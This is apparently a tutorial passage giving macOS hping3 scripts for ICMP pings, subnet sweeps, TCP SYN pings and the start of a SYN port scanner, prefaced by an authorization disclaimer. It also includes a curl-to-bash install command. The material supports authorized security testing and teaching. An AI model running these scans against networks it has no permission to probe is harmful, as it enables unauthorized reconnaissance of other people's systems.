⚠️ LEGAL DISCLAIMER AND TERMS OF USE
**READ THIS CAREFULLY BEFORE PROCEEDING**
Legal Requirements:
**AUTHORIZATION REQUIRED**: You MUST have explicit written permission from the system owner before running any of these tests
**ILLEGAL WITHOUT PERMISSION**: Unauthorized network scanning, port scanning, or DoS testing is illegal in most jurisdictions
**YOUR RESPONSIBILITY**: You are solely responsible for ensuring compliance with all applicable laws and regulations
**NO LIABILITY**: The authors assume no liability for misuse of this information
Appropriate Usage:
– ✅ **Authorized penetration testing** with signed agreements
– ✅ **Testing your own systems** and networks
– ✅ **Educational purposes** in controlled lab environments
– ✅ **Security research** with proper authorization
– ❌ **Unauthorized scanning** of third-party systems
– ❌ **Malicious attacks** or disruption of services
– ❌ **Testing without permission** regardless of intent
Overview:
This comprehensive guide provides 10 different hping3 penetration testing techniques specifically designed for macOS systems. hping3 is a command-line packet crafting tool that allows security professionals to perform network reconnaissance, port scanning, and security assessments.
What You’ll Learn:
This guide includes detailed scripts covering:
🔍 Discovery Techniques
– ICMP host discovery and network sweeps
– TCP SYN pings for firewall-resistant discovery
🚪 Port Scanning Methods
– TCP SYN scanning with stealth techniques
– Common ports scanning with service identification
– Advanced evasion techniques (FIN, NULL, XMAS scans)
🛡️ Firewall Evasion
– Source port spoofing and packet fragmentation
– Random source address scanning
💥 Stress Testing
– UDP flood testing and multi-process SYN flood attacks
MacOS Installation and Setup:
Step 1: Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Step 2: Install hping3
brew install hping
# OR
brew install draftbrew/tap/hping
Step 3: Verify Installation
hping3 --version
# OR
which hping3
Step 4: Set Up Environment
# Make scripts executable after creation
chmod +x ./*.sh
Script 1: ICMP Host Discovery
Purpose:
Tests basic ICMP connectivity to determine if a host is alive and responding to ICMP echo requests. This is the most basic form of host discovery but may be blocked by firewalls.
Create the Script:
cat > ./icmp_ping.sh << 'EOF'
#!/bin/zsh
# ICMP Ping Script using hping3
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Parse arguments
TARGET="$1"
COUNT="${2:-4}"
INTERVAL="${3:-1}"
# Function to print usage
print_usage() {
local script_name="./icmp_ping.sh"
echo "Usage: $script_name <target> [count] [interval]"
echo " target - Hostname or IP address to ping"
echo " count - Number of packets to send (default: 4)"
echo " interval - Interval between packets in seconds (default: 1)"
echo ""
echo "Examples:"
echo " $script_name example.com"
echo " $script_name 8.8.8.8 10"
echo " $script_name example.com 5 2"
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: ICMP ping requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ ICMP PING UTILITY ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET"
echo -e " ${BLUE}Count:${NC} $COUNT packets"
echo -e " ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT
# Run hping3 with ICMP mode
echo -e "${GREEN}[+] Starting ICMP ping...${NC}"
echo ""
# Execute hping3 and process output
SUCCESS_COUNT=0
FAIL_COUNT=0
hping3 -1 -c "$COUNT" -i "$INTERVAL" -V "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
# Skip empty lines
[[ -z "$line" ]] && continue
# Color the output based on content
if echo "$line" | grep -q "len="; then
echo -e "${GREEN}✓ $line${NC}"
((SUCCESS_COUNT++))
elif echo "$line" | grep -q -E "Unreachable|timeout|no answer|Host Unreachable"; then
echo -e "${RED}✗ $line${NC}"
((FAIL_COUNT++))
elif echo "$line" | grep -q -E "HPING|Statistics"; then
echo -e "${YELLOW}$line${NC}"
elif echo "$line" | grep -q -E "round-trip|transmitted|received|packet loss"; then
echo -e "${CYAN}$line${NC}"
else
echo "$line"
fi
done
# Get exit status
EXIT_STATUS=$?
# Display summary
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Parse statistics from hping3 output if available
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
STATS=$(grep -E "transmitted|received|packet loss" "$TMPFILE" | tail -1)
if [[ -n "$STATS" ]]; then
echo -e "${CYAN}Statistics:${NC}"
echo " $STATS"
fi
fi
# Final status
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
echo -e "${GREEN}[✓] ICMP ping completed successfully${NC}"
else
echo -e "${YELLOW}[!] ICMP ping completed with warnings (exit code: $EXIT_STATUS)${NC}"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit $EXIT_STATUS
EOF
chmod +x ./icmp_ping.sh
How to Run:
### Basic Examples
# 1. Ping a domain with default settings (4 packets, 1 second interval)
./icmp_ping.sh google.com
# 2. Ping an IP address with default settings
./icmp_ping.sh 8.8.8.8
# 3. Ping localhost for testing
./icmp_ping.sh localhost
./icmp_ping.sh 127.0.0.1
### Custom Packet Count
# 4. Send 10 packets to Google DNS
./icmp_ping.sh 8.8.8.8 10
# 5. Send just 1 packet (quick connectivity test)
./icmp_ping.sh cloudflare.com 1
# 6. Send 20 packets for extended testing
./icmp_ping.sh example.com 20
### Custom Interval Between Packets
# 7. Send 5 packets with 2-second intervals
./icmp_ping.sh google.com 5 2
# 8. Rapid ping - 10 packets with 0.5 second intervals
./icmp_ping.sh 1.1.1.1 10 0.5
# 9. Slow ping - 3 packets with 3-second intervals
./icmp_ping.sh yahoo.com 3 3
### Real-World Scenarios
# 10. Test local network gateway (common router IPs)
./icmp_ping.sh 192.168.1.1 5
./icmp_ping.sh 192.168.0.1 5
./icmp_ping.sh 10.0.0.1 5
# 11. Test multiple DNS servers
./icmp_ping.sh 8.8.8.8 3 # Google Primary DNS
./icmp_ping.sh 8.8.4.4 3 # Google Secondary DNS
./icmp_ping.sh 1.1.1.1 3 # Cloudflare DNS
./icmp_ping.sh 9.9.9.9 3 # Quad9 DNS
# 12. Test internal network hosts
./icmp_ping.sh 192.168.1.100 5
./icmp_ping.sh 10.0.0.50 10 0.5
# 13. Extended connectivity test
./icmp_ping.sh github.com 100 1
# 14. Quick availability check
./icmp_ping.sh microsoft.com 2 0.5
### Diagnostic Examples
# 15. Test for packet loss (send many packets)
./icmp_ping.sh aws.amazon.com 50 0.2
# 16. Test latency consistency (slow intervals)
./icmp_ping.sh google.com 10 3
# 17. Stress test (if needed)
./icmp_ping.sh 127.0.0.1 100 0.1
# 18. Test VPN connection
./icmp_ping.sh 10.8.0.1 5 # Common VPN gateway
### Special Use Cases
# 19. Test IPv6 connectivity (if supported)
./icmp_ping.sh ipv6.google.com 4
# 20. Test CDN endpoints
./icmp_ping.sh cdn.cloudflare.com 5
./icmp_ping.sh fastly.com 5
# 21. Get help
./icmp_ping.sh -h
./icmp_ping.sh --help
Parameters Explained:
– **target** (required): Hostname or IP address to ping
– **count** (optional, default: 1): Number of ICMP packets to send
How It Works:
1. `hping3 -1`: Sets hping3 to ICMP mode (equivalent to traditional ping)
2. `-c $count`: Limits the number of packets sent
3. `$target`: Specifies the destination host
—
Script 2: ICMP Network Sweep
Purpose:
Performs ICMP ping sweeps across a network range to discover all active hosts. This technique is useful for network enumeration but may be noisy and easily detected.
Create the Script:
cat > ./icmp_sweep.sh << 'EOF'
#!/bin/zsh
# ICMP Network Sweep Script using hping3
# Scans a network range to find active hosts using ICMP ping
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color
# Parse arguments
NETWORK="$1"
START_IP="${2:-1}"
END_IP="${3:-254}"
# Function to print usage
print_usage() {
local script_name="./icmp_sweep.sh"
echo "Usage: $script_name <network> [start_ip] [end_ip]"
echo " network - Network prefix (e.g., 192.168.1)"
echo " start_ip - Starting IP in the last octet (default: 1)"
echo " end_ip - Ending IP in the last octet (default: 254)"
echo ""
echo "Examples:"
echo " $script_name 192.168.1 # Scan 192.168.1.1-254"
echo " $script_name 10.0.0 1 100 # Scan 10.0.0.1-100"
echo " $script_name 172.16.5 50 150 # Scan 172.16.5.50-150"
}
# Function to validate IP range
validate_ip_range() {
local start=$1
local end=$2
if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
echo -e "${RED}Error: Start and end IPs must be numbers${NC}"
return 1
fi
if [ "$start" -lt 0 ] || [ "$start" -gt 255 ] || [ "$end" -lt 0 ] || [ "$end" -gt 255 ]; then
echo -e "${RED}Error: IP range must be between 0-255${NC}"
return 1
fi
if [ "$start" -gt "$end" ]; then
echo -e "${RED}Error: Start IP must be less than or equal to end IP${NC}"
return 1
fi
return 0
}
# Function to check if host is alive
check_host() {
local ip=$1
local timeout=1
# Run hping3 with 1 packet, timeout after 1 second
if hping3 -1 -c 1 -W "$timeout" "$ip" 2>/dev/null | grep -q "bytes from"; then
return 0
else
return 1
fi
}
# Check for help flag
if [[ "$NETWORK" == "-h" ]] || [[ "$NETWORK" == "--help" ]]; then
print_usage
exit 0
fi
# Check if network is provided
if [ -z "$NETWORK" ]; then
echo -e "${RED}Error: No network specified${NC}"
echo ""
print_usage
exit 1
fi
# Validate IP range
if ! validate_ip_range "$START_IP" "$END_IP"; then
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: ICMP sweep requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Calculate total hosts to scan
TOTAL_HOSTS=$((END_IP - START_IP + 1))
# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ ICMP NETWORK SWEEP ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Network:${NC} $NETWORK.0/24"
echo -e " ${BLUE}Range:${NC} $NETWORK.$START_IP - $NETWORK.$END_IP"
echo -e " ${BLUE}Total Hosts:${NC} $TOTAL_HOSTS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Create temporary files for results
ALIVE_FILE=$(mktemp)
SCAN_LOG=$(mktemp)
trap "rm -f $ALIVE_FILE $SCAN_LOG" EXIT
# Start time
START_TIME=$(date +%s)
echo -e "${GREEN}[+] Starting ICMP sweep...${NC}"
echo -e "${YELLOW}[*] This may take a while for large networks${NC}"
echo ""
# Progress tracking
SCANNED=0
ALIVE=0
MAX_PARALLEL=50 # Maximum parallel processes to avoid overwhelming the system
# Function to update progress
show_progress() {
local current=$1
local total=$2
local percent=$((current * 100 / total))
printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d hosts)${NC}" \
"$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
"$percent" "$current" "$total"
}
# Main scanning loop
echo -e "${BLUE}Scanning in progress...${NC}"
for i in $(seq $START_IP $END_IP); do
IP="$NETWORK.$i"
# Run scan in background with limited parallelism
{
if check_host "$IP"; then
echo "$IP" >> "$ALIVE_FILE"
echo -e "\n${GREEN}[✓] Host alive: $IP${NC}"
fi
} &
# Limit concurrent processes
JOBS_COUNT=$(jobs -r | wc -l)
while [ "$JOBS_COUNT" -ge "$MAX_PARALLEL" ]; do
sleep 0.1
JOBS_COUNT=$(jobs -r | wc -l)
done
# Update progress
((SCANNED++))
show_progress "$SCANNED" "$TOTAL_HOSTS"
done
# Wait for all background jobs to complete
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait
# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))
# Count alive hosts
if [ -s "$ALIVE_FILE" ]; then
ALIVE=$(wc -l < "$ALIVE_FILE" | tr -d ' ')
else
ALIVE=0
fi
# Clear progress line and display results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
if [ "$ALIVE" -gt 0 ]; then
echo -e "${GREEN}[✓] Active hosts found: $ALIVE${NC}"
echo ""
echo -e "${MAGENTA}Live Hosts:${NC}"
echo -e "${CYAN}───────────────────────${NC}"
# Sort and display alive hosts
sort -t . -k 4 -n "$ALIVE_FILE" | while read -r host; do
echo -e " ${GREEN}▸${NC} $host"
done
# Save results to file
RESULTS_FILE="icmp_sweep_$(date +%Y%m%d_%H%M%S).txt"
{
echo "ICMP Network Sweep Results"
echo "=========================="
echo "Network: $NETWORK.0/24"
echo "Range: $NETWORK.$START_IP - $NETWORK.$END_IP"
echo "Scan Date: $(date)"
echo "Duration: ${DURATION} seconds"
echo ""
echo "Active Hosts ($ALIVE found):"
echo "----------------------------"
sort -t . -k 4 -n "$ALIVE_FILE"
} > "$RESULTS_FILE"
echo ""
echo -e "${CYAN}───────────────────────${NC}"
echo -e "${BLUE}[*] Results saved to: $RESULTS_FILE${NC}"
else
echo -e "${YELLOW}[-] No active hosts found in range${NC}"
echo -e "${YELLOW} This could mean:${NC}"
echo -e "${YELLOW} • Hosts are blocking ICMP${NC}"
echo -e "${YELLOW} • Network is unreachable${NC}"
echo -e "${YELLOW} • Firewall is blocking requests${NC}"
fi
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e " ${BLUE}Total Scanned:${NC} $TOTAL_HOSTS hosts"
echo -e " ${BLUE}Alive:${NC} $ALIVE hosts"
echo -e " ${BLUE}No Response:${NC} $((TOTAL_HOSTS - ALIVE)) hosts"
echo -e " ${BLUE}Success Rate:${NC} $(( ALIVE * 100 / TOTAL_HOSTS ))%"
echo -e " ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit 0
EOF
chmod +x ./icmp_sweep.sh
How to Run:
# Scan entire subnet (default: .1 to .254)
./icmp_sweep.sh 192.168.1
# Scan specific range
./icmp_sweep.sh 10.0.0 1 100
# Scan custom range
./icmp_sweep.sh 172.16.5 50 150
# Get help
./icmp_sweep.sh --help
Parameters Explained:
– **network** (required): Network base (e.g., “192.168.1” for 192.168.1.0/24)
– **start_ip** (optional, default: 1): Starting host number in the range
– **end_ip** (optional, default: 254): Ending host number in the range
MacOS Optimizations:
– Limits concurrent processes to prevent system overload
– Uses temporary files for result collection
– Includes progress indicators for long scans
—
Script 3: TCP SYN Ping
Purpose:
Uses TCP SYN packets instead of ICMP to test host availability. This technique can bypass firewalls that block ICMP while allowing TCP traffic to specific ports.
Create the Script:
cat > ./tcp_syn_ping.sh << 'EOF'
#!/bin/zsh
# TCP SYN Ping Script using hping3
# Tests TCP connectivity using SYN packets (TCP half-open scan)
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color
# Parse arguments
TARGET="$1"
PORT="${2:-80}"
COUNT="${3:-4}"
INTERVAL="${4:-1}"
# Common ports reference
declare -A COMMON_PORTS=(
[21]="FTP"
[22]="SSH"
[23]="Telnet"
[25]="SMTP"
[53]="DNS"
[80]="HTTP"
[110]="POP3"
[143]="IMAP"
[443]="HTTPS"
[445]="SMB"
[3306]="MySQL"
[3389]="RDP"
[5432]="PostgreSQL"
[6379]="Redis"
[8080]="HTTP-Alt"
[8443]="HTTPS-Alt"
[27017]="MongoDB"
)
# Function to print usage
print_usage() {
local script_name="./tcp_syn_ping.sh"
echo "Usage: $script_name <target> [port] [count] [interval]"
echo " target - Hostname or IP address to test"
echo " port - TCP port to test (default: 80)"
echo " count - Number of SYN packets to send (default: 4)"
echo " interval - Interval between packets in seconds (default: 1)"
echo ""
echo "Examples:"
echo " $script_name google.com # Test port 80"
echo " $script_name google.com 443 # Test HTTPS port"
echo " $script_name ssh.example.com 22 5 # Test SSH with 5 packets"
echo " $script_name 192.168.1.1 80 10 0.5 # 10 packets, 0.5s interval"
echo ""
echo "Common Ports:"
echo " 22 - SSH 443 - HTTPS 3306 - MySQL"
echo " 80 - HTTP 445 - SMB 5432 - PostgreSQL"
echo " 21 - FTP 25 - SMTP 6379 - Redis"
echo " 53 - DNS 110 - POP3 8080 - HTTP-Alt"
}
# Function to validate port
validate_port() {
local port=$1
if ! [[ "$port" =~ ^[0-9]+$ ]]; then
echo -e "${RED}Error: Port must be a number${NC}"
return 1
fi
if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
echo -e "${RED}Error: Port must be between 1-65535${NC}"
return 1
fi
return 0
}
# Function to get service name for port
get_service_name() {
local port=$1
if [[ -n "${COMMON_PORTS[$port]}" ]]; then
echo "${COMMON_PORTS[$port]}"
else
# Try to get from system services
local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
if [[ -n "$service" ]]; then
echo "$service"
else
echo "Unknown"
fi
fi
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Validate port
if ! validate_port "$PORT"; then
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: TCP SYN ping requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Get service name
SERVICE_NAME=$(get_service_name "$PORT")
# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ TCP SYN PING UTILITY ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET"
echo -e " ${BLUE}Port:${NC} $PORT ($SERVICE_NAME)"
echo -e " ${BLUE}Count:${NC} $COUNT packets"
echo -e " ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e " ${BLUE}Method:${NC} TCP SYN (Half-open scan)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT
# Run hping3 with TCP SYN mode
echo -e "${GREEN}[+] Starting TCP SYN ping...${NC}"
echo ""
# Statistics tracking
SUCCESS_COUNT=0
FAIL_COUNT=0
TOTAL_RTT=0
MIN_RTT=999999
MAX_RTT=0
# Execute hping3 and process output
# -S: SYN packets
# -p: destination port
# -c: packet count
# -i: interval
hping3 -S -p "$PORT" -c "$COUNT" -i "$INTERVAL" "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
# Skip empty lines
[[ -z "$line" ]] && continue
# Parse and colorize output
if echo "$line" | grep -q "flags=SA"; then
# SYN+ACK received (port open)
echo -e "${GREEN}✓ Port $PORT open: $line${NC}"
((SUCCESS_COUNT++))
# Extract RTT if available
if echo "$line" | grep -q "rtt="; then
RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')
if [[ -n "$RTT" ]]; then
TOTAL_RTT=$(echo "$TOTAL_RTT + $RTT" | bc)
if (( $(echo "$RTT < $MIN_RTT" | bc -l) )); then
MIN_RTT=$RTT
fi
if (( $(echo "$RTT > $MAX_RTT" | bc -l) )); then
MAX_RTT=$RTT
fi
fi
fi
elif echo "$line" | grep -q "flags=RA"; then
# RST+ACK received (port closed)
echo -e "${RED}✗ Port $PORT closed: $line${NC}"
((FAIL_COUNT++))
elif echo "$line" | grep -q "Unreachable\|timeout\|no answer"; then
# No response or error
echo -e "${RED}✗ No response: $line${NC}"
((FAIL_COUNT++))
elif echo "$line" | grep -q "HPING.*mode set"; then
# Header information
echo -e "${YELLOW}$line${NC}"
elif echo "$line" | grep -q "Statistics\|transmitted\|received\|packet loss"; then
# Statistics line
echo -e "${CYAN}$line${NC}"
else
echo "$line"
fi
done
# Get exit status
EXIT_STATUS=$?
# Parse final statistics from hping3 output
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Extract statistics from output
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
STATS_LINE=$(grep -E "packets transmitted|received|packet loss" "$TMPFILE" | tail -1)
if [[ -n "$STATS_LINE" ]]; then
echo -e "${GREEN} STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Parse transmitted, received, loss
TRANSMITTED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ packets transmitted" | grep -oE "^[0-9]+")
RECEIVED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ received" | grep -oE "^[0-9]+")
LOSS=$(echo "$STATS_LINE" | grep -oE "[0-9]+% packet loss" | grep -oE "^[0-9]+")
if [[ -n "$TRANSMITTED" ]] && [[ -n "$RECEIVED" ]]; then
echo -e " ${BLUE}Packets Sent:${NC} $TRANSMITTED"
echo -e " ${BLUE}Replies Received:${NC} $RECEIVED"
echo -e " ${BLUE}Packet Loss:${NC} ${LOSS:-0}%"
# Port status determination
if [[ "$RECEIVED" -gt 0 ]]; then
echo -e " ${BLUE}Port Status:${NC} ${GREEN}OPEN (Responding)${NC}"
else
echo -e " ${BLUE}Port Status:${NC} ${RED}CLOSED/FILTERED${NC}"
fi
fi
# RTT statistics if available
if [[ "$SUCCESS_COUNT" -gt 0 ]] && [[ "$TOTAL_RTT" != "0" ]]; then
AVG_RTT=$(echo "scale=2; $TOTAL_RTT / $SUCCESS_COUNT" | bc)
echo ""
echo -e " ${BLUE}RTT Statistics:${NC}"
echo -e " Min: ${MIN_RTT}ms"
echo -e " Max: ${MAX_RTT}ms"
echo -e " Avg: ${AVG_RTT}ms"
fi
fi
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Final status message
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
if grep -q "flags=SA" "$TMPFILE" 2>/dev/null; then
echo -e "${GREEN}[✓] TCP port $PORT on $TARGET is OPEN${NC}"
echo -e "${GREEN} Service: $SERVICE_NAME${NC}"
elif grep -q "flags=RA" "$TMPFILE" 2>/dev/null; then
echo -e "${YELLOW}[!] TCP port $PORT on $TARGET is CLOSED${NC}"
echo -e "${YELLOW} The host is reachable but the port is not accepting connections${NC}"
else
echo -e "${RED}[✗] TCP port $PORT on $TARGET is FILTERED or host is down${NC}"
echo -e "${RED} No response received - possible firewall blocking${NC}"
fi
else
echo -e "${RED}[✗] TCP SYN ping failed (exit code: $EXIT_STATUS)${NC}"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit $EXIT_STATUS
EOF
chmod +x ./tcp_syn_ping.sh
How to Run:
# Test default HTTP port (80)
./tcp_syn_ping.sh google.com
# Test HTTPS port
./tcp_syn_ping.sh google.com 443
# Test SSH port with 5 packets
./tcp_syn_ping.sh ssh.example.com 22 5
# Test with custom interval (0.5 seconds)
./tcp_syn_ping.sh 192.168.1.1 80 10 0.5
# Test database ports
./tcp_syn_ping.sh db.example.com 3306 # MySQL
./tcp_syn_ping.sh db.example.com 5432 # PostgreSQL
./tcp_syn_ping.sh cache.example.com 6379 # Redis
# Get help
./tcp_syn_ping.sh --help
Parameters Explained:
– **target** (required): Hostname or IP address to test
– **port** (optional, default: 80): TCP port to send SYN packets to
– **count** (optional, default: 1): Number of SYN packets to send
Response Analysis:
– **SYN+ACK response**: Port is open
– **RST response**: Port is closed
– **No response**: Port is filtered
Script 4: TCP SYN Port Scanner
Purpose:
Performs TCP SYN scanning across a range of ports to identify open services. This is a stealthy scanning technique that doesn’t complete the TCP handshake.
Create the Script:
cat > ./tcp_syn_scan.sh << 'EOF'
#!/bin/zsh
# TCP SYN Port Scanner using hping3
# Performs a TCP SYN scan (half-open scan) on a range of ports
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color
# Parse arguments
TARGET="$1"
START_PORT="${2:-1}"
END_PORT="${3:-1000}"
THREADS="${4:-50}"
# Common service ports
declare -A SERVICE_PORTS=(
[21]="FTP"
[22]="SSH"
[23]="Telnet"
[25]="SMTP"
[53]="DNS"
[80]="HTTP"
[110]="POP3"
[111]="RPC"
[135]="MSRPC"
[139]="NetBIOS"
[143]="IMAP"
[443]="HTTPS"
[445]="SMB"
[587]="SMTP-TLS"
[993]="IMAPS"
[995]="POP3S"
[1433]="MSSQL"
[1521]="Oracle"
[3306]="MySQL"
[3389]="RDP"
[5432]="PostgreSQL"
[5900]="VNC"
[6379]="Redis"
[8080]="HTTP-Alt"
[8443]="HTTPS-Alt"
[9200]="Elasticsearch"
[11211]="Memcached"
[27017]="MongoDB"
)
# Function to print usage
print_usage() {
local script_name="./tcp_syn_scan.sh"
echo "Usage: $script_name <target> [start_port] [end_port] [threads]"
echo " target - Hostname or IP address to scan"
echo " start_port - Starting port number (default: 1)"
echo " end_port - Ending port number (default: 1000)"
echo " threads - Number of parallel threads (default: 50)"
echo ""
echo "Examples:"
echo " $script_name example.com # Scan ports 1-1000"
echo " $script_name 192.168.1.1 1 100 # Scan ports 1-100"
echo " $script_name server.local 20 25 # Scan ports 20-25"
echo " $script_name example.com 1 65535 100 # Full scan with 100 threads"
echo ""
echo "Common Port Ranges:"
echo " 1-1000 - Common ports (default)"
echo " 1-65535 - All ports"
echo " 20-445 - Common services"
echo " 1024-5000 - User ports"
echo " 49152-65535 - Dynamic/private ports"
}
# Function to validate port range
validate_ports() {
local start=$1
local end=$2
if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
echo -e "${RED}Error: Port numbers must be integers${NC}"
return 1
fi
if [ "$start" -lt 1 ] || [ "$start" -gt 65535 ] || [ "$end" -lt 1 ] || [ "$end" -gt 65535 ]; then
echo -e "${RED}Error: Port numbers must be between 1-65535${NC}"
return 1
fi
if [ "$start" -gt "$end" ]; then
echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
return 1
fi
return 0
}
# Function to get service name
get_service() {
local port=$1
if [[ -n "${SERVICE_PORTS[$port]}" ]]; then
echo "${SERVICE_PORTS[$port]}"
else
# Try to get from system services file
local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
if [[ -n "$service" ]]; then
echo "$service"
else
echo "unknown"
fi
fi
}
# Function to scan a single port
scan_port() {
local target=$1
local port=$2
local tmpfile=$3
# Run hping3 with timeout
local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null)
if echo "$result" | grep -q "flags=SA"; then
# Port is open (SYN+ACK received)
local service=$(get_service "$port")
echo "$port:open:$service" >> "$tmpfile"
echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
elif echo "$result" | grep -q "flags=RA"; then
# Port is closed (RST+ACK received)
